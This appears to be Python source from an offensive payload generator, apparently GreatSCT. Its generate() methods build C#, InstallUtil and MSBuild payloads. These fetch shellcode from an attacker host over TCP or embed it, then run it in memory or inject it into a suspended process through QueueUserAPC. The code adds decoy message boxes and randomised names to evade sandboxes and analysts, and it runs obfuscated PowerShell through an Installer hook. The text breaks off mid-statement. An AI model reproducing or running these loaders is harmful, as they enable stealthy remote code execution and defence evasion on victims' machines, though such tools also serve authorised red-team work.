    #required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n"
    payload_code += "namespace {0}\n {{".format(namespace)
    payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(classhellcodeName)
    # placeholder for legitimate C# program
    # lets add a message box to throw offf sandbox heuristics and analysts :)
    payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(classhellcodeName)
    # Both COM (un)registration hooks call the same static entry point.
    payload_code += "\n\t\t[ComRegisterFunction]"
    payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(classhellcodeNameTwo, execName)
    payload_code += "\n[ComUnregisterFunction]"
    payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(key)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classhellcodeNameTwo, execName)
    payload_code += "\n\tpublic class {0}\n\t{{".format(classhellcodeNameTwo)
    # P/Invoke declarations; parameter names are randomised from r / y.
    # No declarations (and no inject routine below) are emitted for any
    # other INJECT_METHOD value.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])
    hostName = helpers.randomString()
    portName = helpers.randomString()
    ipName = helpers.randomString()
    sockName = helpers.randomString()
    length_rawName = helpers.randomString()
    lengthName = helpers.randomString()
    sName = helpers.randomString()
    total_bytesName = helpers.randomString()
    handleName = helpers.randomString()
    # getData(host, port): TCP connect, 4-byte length header, then the body
    # in <=4096-byte chunks.  The Receive() for the header is not checked
    # for a short read and the remote-supplied length is trusted as-is
    # (a negative value makes `new byte[len + 5]` throw).
    payload_code += "static byte[] %s(string %s, int %s) {\n" % (getDataName, hostName, portName)
    payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (ipName, hostName, portName)
    payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (sockName)
    payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName)
    payload_code += " catch { return null;}\n"
    payload_code += " byte[] %s = new byte[4];\n" % (length_rawName)
    payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName)
    payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % (lengthName, length_rawName)
    payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName)
    payload_code += " int %s = 0;\n" % (total_bytesName)
    payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName)
    payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName)
    # The first 5 bytes of the buffer are a 0xBF opcode plus the socket
    # handle, so the received body is consumed with the live socket.
    payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (handleName, sockName)
    payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (handleName, sName, sName)
    payload_code += " return %s;}\n" % (sName)
    # Inject routine.  "virtual": VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    # + CreateThread.  "heap": HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) +
    # HeapAlloc(HEAP_ZERO_MEMORY) + RtlMoveMemory + CreateThread.  Both wait
    # on the thread indefinitely (0xFFFFFFFF == INFINITE).
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName)
        payload_code += " if (%s != null) {\n" % (shellcodeName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, shellcodeName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (shellcodeName, funcAddrName, shellcodeName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName)
        payload_code += " if (%s != null) {\n" % (shellcodeName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, shellcodeName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, shellcodeName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, shellcodeName, shellcodeName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)
    randomName = bypass_helpers.randomString()
    num_tabs_required = 0
    # Static entry point called from the COM hooks above.
    payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
    # senecas_games returns extra C# plus the number of braces it left open;
    # 3 more are added for namespace/class/method and all are closed below.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 3
    # LHOST/LPORT are interpolated verbatim into the C# source.
    payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % (sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payload_code += " %s(%s);\n" % (injectName, sName)
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build C# source for an InstallUtil Installer that runs a PowerShell script.

    The emitted file has a decoy ``Main()`` (message-box loop) and an
    ``Installer`` subclass whose ``Uninstall`` override decodes the embedded,
    base64-encoded script and runs it through a Runspace.  The script comes
    from ``required_options["SCRIPT"]`` with ``FUNCTION`` appended and is
    optionally encoded via ``invoke_obfuscation``.  The finished source is
    stored in ``self.payload_source_code``; returns None.
    """
    # Parse "KEY=value" pairs handed over on the command line (-c) into
    # required_options.  An item containing neither "," nor " " is not
    # split, so `options` keeps whatever the previous iteration produced.
    options = []
    for option in self.cli_opts.c:
        if "," in option:
            options = option.split(",")
        if " " in option:
            options = option.split(" ")
        for o in options:
            for i in self.required_options:
                if i in o:
                    # NOTE(review): str.strip removes a *set* of characters from
                    # both ends, not the "KEY=" prefix, so a value whose first or
                    # last character occurs in KEY (or is "=") gets clipped.
                    self.required_options[i][0] = o.strip("{0}=".format(i))
    with open(self.required_options["SCRIPT"][0], "r") as f:
        the_script = f.read()
    if self.required_options["FUNCTION"][0].lower() != "x":
        # Append FUNCTION to end of script
        the_script += "\n{0}".format(self.required_options["FUNCTION"][0])
        FunctionName = self.required_options["FUNCTION"][0]
    else:
        FunctionName = "\"None\""
    # NOTE(review): FunctionName is assigned but not referenced again in this
    # method; the function is only reachable through the appended script text.
    if self.required_options["OBFUSCATION"][0].lower() != "x":
        if self.required_options["OBFUSCATION"][0].lower() == "binary":
            the_script = invoke_obfuscation.binaryEncode(the_script)
        elif self.required_options["OBFUSCATION"][0].lower() == "ascii":
            the_script = invoke_obfuscation.asciiEncode(the_script)
        else:
            # Any other OBFUSCATION value silently falls back to binary encoding.
            the_script = invoke_obfuscation.binaryEncode(the_script)
    # randomize all our variable names, yo'
    className = bypass_helpers.randomString()
    classNameTwo = bypass_helpers.randomString()
    classNameThree = bypass_helpers.randomString()
    execName = bypass_helpers.randomString()
    bytearrayName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    savedStateName = bypass_helpers.randomString()
    messWithAnalystName = bypass_helpers.randomString()
    shellcodeName = bypass_helpers.randomString()
    rand_bool = bypass_helpers.randomString()
    random_out = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    num_tabs_required = 0
    # get random variables for the API imports
    r = [bypass_helpers.randomString() for x in range(16)]
    y = [bypass_helpers.randomString() for x in range(17)]
    #required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
    payload_code += "\tpublic class {0} {{\n".format(className)
    payload_code += "\t\tpublic static void Main()\n\t\t{\n"
    # lets add a message box to throw offf sandbox heuristics and analysts :)
    # there is no decryption routine, troll.level = 9000
    # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
    # This string is not passed through .format(), so "{{" / "}}" reach the
    # C# source literally (two nested braces), which is still valid C#.
    payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
    payload_code += "\t\t}\n\t}\n\n"
    # The real entry point: InstallUtil calls Uninstall() on RunInstaller classes.
    payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
    payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo)
    payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName)
    payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName)
    payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
    payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
    # senecas_games returns extra C# plus the number of braces it left open;
    # the while loop further down closes them.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    encodedScript = bypass_helpers.randomString()
    # NOTE(review): bytes(..., 'latin-1') raises UnicodeEncodeError for any
    # script character outside Latin-1 -- TODO confirm the intended encoding.
    encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii')
    powershellCmd = bypass_helpers.randomString()
    data = bypass_helpers.randomString()
    command = bypass_helpers.randomString()
    RunPSCommand = bypass_helpers.randomString()
    cmd = bypass_helpers.randomString()
    runspace = bypass_helpers.randomString()
    scriptInvoker = bypass_helpers.randomString()
    pipeline = bypass_helpers.randomString()
    results = bypass_helpers.randomString()
    stringBuilder = bypass_helpers.randomString()
    obj = bypass_helpers.randomString()
    RunPSFile = bypass_helpers.randomString()
    script = bypass_helpers.randomString()
    ps = bypass_helpers.randomString()
    e = bypass_helpers.randomString()
    # Decode the embedded script and run it; any exception message is printed.
    payload_code += """string {0} = "{1}"; string {2} = ""; byte[] {3} = Convert.FromBase64String({0}); string {4} = Encoding.ASCII.GetString({3}); {2} = {4}; try {{ Console.Write({5}({2})); }} catch (Exception {6}) {{ Console.Write({6}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e)
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1
    # Runspace helper (RunPSCommand) plus an unused PowerShell.Create() helper.
    payload_code +="""}} public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); {4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps)
    payload_code += "\n}"
    self.payload_source_code = payload_code
    return
def generate(self):
    """Build an MSBuild project file whose inline C# task runs embedded shellcode.

    Shellcode comes from ``self.shellcode.generate`` or ``self.cli_shellcode``
    (expected as a "\\xNN\\xNN..." string), is rewritten as a C# byte-array
    initialiser and executed by the inject method chosen by
    ``required_options["INJECT_METHOD"]`` ("virtual" or "heap") inside a
    CodeTaskFactory task.  Sets ``self.payload_type`` and stores the finished
    XML in ``self.payload_source_code``; returns None.
    """
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode
    # "\x41\x42" -> split on "\" -> ['', 'x41', 'x42'] -> "0x41,0x42".
    # Nothing validates the input format; a string without backslashes
    # yields just "0".
    Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
    # randomize all our variable names, yo'
    targetName = bypass_helpers.randomString()
    namespaceName = bypass_helpers.randomString()
    className = bypass_helpers.randomString()
    bytearrayName = bypass_helpers.randomString()
    funcAddrName = bypass_helpers.randomString()
    hThreadName = bypass_helpers.randomString()
    threadIdName = bypass_helpers.randomString()
    pinfoName = bypass_helpers.randomString()
    num_tabs_required = 0
    # get 12 random variables for the API imports
    r = [bypass_helpers.randomString() for x in range(12)]
    y = [bypass_helpers.randomString() for x in range(17)]
    # The header for MSBuild XML files
    # TODO: Fix the awful formatting
    msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className)
    #required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
    payload_code += "public class %s : Task, ITask {\n" % (className)
    # P/Invoke declarations; parameter names are randomised from r / y.
    # No declarations (and no inject code below) are emitted for any other
    # INJECT_METHOD value, leaving Execute() with only the senecas_games body.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])
    # senecas_games returns extra C# plus the number of braces it left open;
    # 2 more are added for class/Execute() and all are closed below.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    num_tabs_required += 2
    # Inject code.  "virtual": VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    # + CreateThread.  "heap": HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) +
    # HeapAlloc(HEAP_ZERO_MEMORY) + RtlMoveMemory + CreateThread.  Both wait
    # on the thread indefinitely (0xFFFFFFFF == INFINITE).
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # Unlike the heap branch this declaration has no trailing "\n"; C#
        # does not care, but the emitted source is harder to read.
        payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};" % (bytearrayName, Shellcode)
        payload_code += '\t' * num_tabs_required + "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
        payload_code += '\t' * num_tabs_required + "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
        payload_code += '\t' * num_tabs_required + "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (hThreadName, threadIdName, pinfoName)
        payload_code += '\t' * num_tabs_required + "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += '\t' * num_tabs_required + "WaitForSingleObject(%s, 0xFFFFFFFF);\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        rand_heap = bypass_helpers.randomString()
        rand_ptr = bypass_helpers.randomString()
        rand_var = bypass_helpers.randomString()
        payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (bytearrayName, Shellcode)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, bytearrayName, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(rand_var)
        payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var)
        payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);\n'.format(hThreadName)
    # Close the open braces innermost-first; the Execute() return value is
    # emitted just before its own closing brace (depth 2).
    while (num_tabs_required != 0):
        if num_tabs_required == 2:
            # return true for the msbuild Execute() function
            payload_code += "\nreturn true;"
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1
        else:
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1
    payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
    payload_code = msbuild_header + payload_code
    self.payload_source_code = payload_code
    return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variables, yo x86 = bypass_helpers.randomString() # generate a random key key = bypass_helpers.randomString().lower() # figure out a sane way to generate two separate instances of shellcode within the framework # currently, only 32 bit payload shellcode will work payload_code, num_tabs_required = gamemaker.senecas_games(self) code = "" num_tabs = 0 bytearrayName = bypass_helpers.randomString() className = "HelloWorld" processMigrate = "Print" processMigratex86 = bypass_helpers.randomString() processMigrateProcessPath = bypass_helpers.randomString() processMigrateShellcode = bypass_helpers.randomString() shellCode = bypass_helpers.randomString() startupInfo = bypass_helpers.randomString() processInformation = bypass_helpers.randomString() success = bypass_helpers.randomString() resultPtr = bypass_helpers.randomString() bytesWritten = bypass_helpers.randomString() resultBool = bypass_helpers.randomString() oldProtect = bypass_helpers.randomString() targetProc = bypass_helpers.randomString() currentThreads = bypass_helpers.randomString() sht = bypass_helpers.randomString() ptr = bypass_helpers.randomString() ThreadHandle = bypass_helpers.randomString() code += "using System;\nusing System.Diagnostics;\nusing System.Reflection;\nusing System.Runtime.InteropServices;\nusing System.Linq;\n\n" code += "[ComVisible(true)]\n" code += "public class {0}\n".format(className) code += "{\n" num_tabs += 1 code += 
"\t" * num_tabs + "public {0}()\n".format(className) code += "\t" * num_tabs + "{\n\n" code += "\t" * num_tabs + "}\n\n" code += "\t" * num_tabs + "public void {0}(string {1})\n".format( processMigrate, processMigratex86) code += "\t" * num_tabs + "{\n" code += "\t" * num_tabs + payload_code code += "\t" * num_tabs + "string {0};\n".format( processMigrateShellcode) code += "\t" * num_tabs + "string {0};\n".format( processMigrateProcessPath) code += "\t" * num_tabs + "\t{0} = {1};\n".format( processMigrateShellcode, processMigratex86) code += "\t" * num_tabs + "\t{0} = \"{1}\";\n\n".format( processMigrateProcessPath, "C:\\\\Windows\\\\System32\\\\" + self.required_options["PROCESS"][0]) code += '\t' * num_tabs + "\tstring %s = System.Text.ASCIIEncoding.ASCII.GetString(Convert.FromBase64String(%s));\n" % ( bytearrayName, processMigrateShellcode) code += '\t' * num_tabs + "\tstring[] chars = %s.Split(',').ToArray();\n" % ( bytearrayName) code += '\t' * num_tabs + "\tbyte[] %s = new byte[chars.Length];\n" % ( shellCode) code += '\t' * num_tabs + \ "\tfor (int i = 0; i < chars.Length; ++i) { %s[i] = Convert.ToByte(chars[i], 16); }\n" % ( shellCode) code += "\t" * num_tabs + "\tSTARTUPINFO {0} = new STARTUPINFO();\n".format( startupInfo) code += "\t" * num_tabs + "\tPROCESS_INFORMATION {0} = new PROCESS_INFORMATION();\n".format( processInformation) code += "\t" * num_tabs + "\tbool {0} = CreateProcess({1}, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED | ProcessCreationFlags.CREATE_NO_WINDOW , IntPtr.Zero, null, ref {2}, out {3});\n".format( success, processMigrateProcessPath, startupInfo, processInformation) code += "\t" * num_tabs + "\tIntPtr {0} = VirtualAllocEx({1}.hProcess, IntPtr.Zero, {2}.Length, MEM_COMMIT, PAGE_READWRITE);\n".format( resultPtr, processInformation, shellCode) code += "\t" * num_tabs + "\tIntPtr {0} = IntPtr.Zero;\n".format( bytesWritten) code += "\t" * num_tabs + "\tbool {0} = 
WriteProcessMemory({1}.hProcess,{2},{3},{4}.Length, out {5});\n".format( resultBool, processInformation, resultPtr, shellCode, shellCode, bytesWritten) code += "\t" * num_tabs + "\tuint {0} = 0;\n".format(oldProtect) code += "\t" * num_tabs + "\t{0} = VirtualProtectEx({1}.hProcess, {2}, {3}.Length, PAGE_EXECUTE_READ, out {4} );\n".format( resultBool, processInformation, resultPtr, shellCode, oldProtect) code += "\t" * num_tabs + "\tProcess {0} = Process.GetProcessById((int){1}.dwProcessId);\n".format( targetProc, processInformation) code += "\t" * num_tabs + "\tProcessThreadCollection {0} = {1}.Threads;\n".format( currentThreads, targetProc) code += "\t" * num_tabs + "\tIntPtr {0} = OpenThread(ThreadAccess.SET_CONTEXT, false, {1}[0].Id);\n".format( sht, currentThreads) code += "\t" * num_tabs + "\tIntPtr {0} = QueueUserAPC({1},{2},IntPtr.Zero);\n".format( ptr, resultPtr, sht) code += "\t" * num_tabs + "\tIntPtr {0} = {1}.hThread;\n".format( ThreadHandle, processInformation) code += "\t" * num_tabs + "\tResumeThread({0});\n".format(ThreadHandle) code += "\t" * num_tabs + "}\n" code += """ private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READ = 0x20; private static UInt32 PAGE_READWRITE = 0x04; [Flags] public enum ProcessAccessFlags : uint { All = 0x001F0FFF, Terminate = 0x00000001, CreateThread = 0x00000002, VirtualMemoryOperation = 0x00000008, VirtualMemoryRead = 0x00000010, VirtualMemoryWrite = 0x00000020, DuplicateHandle = 0x00000040, CreateProcess = 0x000000080, SetQuota = 0x00000100, SetInformation = 0x00000200, QueryInformation = 0x00000400, QueryLimitedInformation = 0x00001000, Synchronize = 0x00100000 } [Flags] public enum ProcessCreationFlags : uint { ZERO_FLAG = 0x00000000, CREATE_BREAKAWAY_FROM_JOB = 0x01000000, CREATE_DEFAULT_ERROR_MODE = 0x04000000, CREATE_NEW_CONSOLE = 0x00000010, CREATE_NEW_PROCESS_GROUP = 0x00000200, CREATE_NO_WINDOW = 0x08000000, CREATE_PROTECTED_PROCESS = 0x00040000, CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 
0x02000000, CREATE_SEPARATE_WOW_VDM = 0x00001000, CREATE_SHARED_WOW_VDM = 0x00001000, CREATE_SUSPENDED = 0x00000004, CREATE_UNICODE_ENVIRONMENT = 0x00000400, DEBUG_ONLY_THIS_PROCESS = 0x00000002, DEBUG_PROCESS = 0x00000001, DETACHED_PROCESS = 0x00000008, EXTENDED_STARTUPINFO_PRESENT = 0x00080000, INHERIT_PARENT_AFFINITY = 0x00010000 } public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId; } public struct STARTUPINFO { public uint cb; public string lpReserved; public string lpDesktop; public string lpTitle; public uint dwX; public uint dwY; public uint dwXSize; public uint dwYSize; public uint dwXCountChars; public uint dwYCountChars; public uint dwFillAttribute; public uint dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [Flags] public enum ThreadAccess : int { TERMINATE = (0x0001) , SUSPEND_RESUME = (0x0002) , GET_CONTEXT = (0x0008) , SET_CONTEXT = (0x0010) , SET_INFORMATION = (0x0020) , QUERY_INFORMATION = (0x0040) , SET_THREAD_TOKEN = (0x0080) , IMPERSONATE = (0x0100) , DIRECT_IMPERSONATION = (0x0200) } [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); [DllImport("kernel32.dll",SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); [DllImport("kernel32.dll", SetLastError = true )] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32.dll")] static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint 
flNewProtect, out uint lpflOldProtect); [DllImport("kernel32.dll")] public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); [DllImport("kernel32.dll")] public static extern uint ResumeThread(IntPtr hThread); [DllImport("kernel32.dll")] public static extern uint SuspendThread(IntPtr hThread); } """ with open("/tmp/hta_source.cs", "w") as f: f.write(code) if self.required_options["SCRIPT_TYPE"][0].lower() == "jscript": with open("/tmp/migrate.js", "w") as ff: ff.write("o.Print({0});".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} -out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine /usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -c HelloWorld -o {0} -s /tmp/migrate.js" .format("/tmp/greatsct.js")) with open("/tmp/greatsct.js", 